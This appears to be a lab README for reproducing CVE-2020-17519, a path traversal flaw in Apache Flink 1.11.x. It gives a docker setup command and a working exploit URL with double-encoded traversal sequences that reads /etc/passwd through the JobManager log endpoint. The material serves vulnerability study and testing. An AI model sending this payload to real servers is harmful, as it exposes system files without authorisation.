# Apache Flink `jobmanager/logs` Path Traversal (CVE-2020-17519) [中文版本(Chinese version)](README.zh-cn.md) Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities. A vulnerability introduced in Apache Flink 1.11.0 (and present in versions 1.11.1 and 1.11.2) allows attackers to read arbitrary files from the local filesystem through the JobManager's REST interface. This path traversal vulnerability exists in the log viewing functionality. References: - - ## Environment Setup Execute the following command to start an Apache Flink jobmanager 1.11.2: ``` docker compose up -d ``` After the Apache Flink service is started, visit `http://your-ip:8081` to access the management interface. ## Vulnerability Reproduction Access the following URL to read the contents of `/etc/passwd` file from the target server: ``` http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd ``` ![](1.png)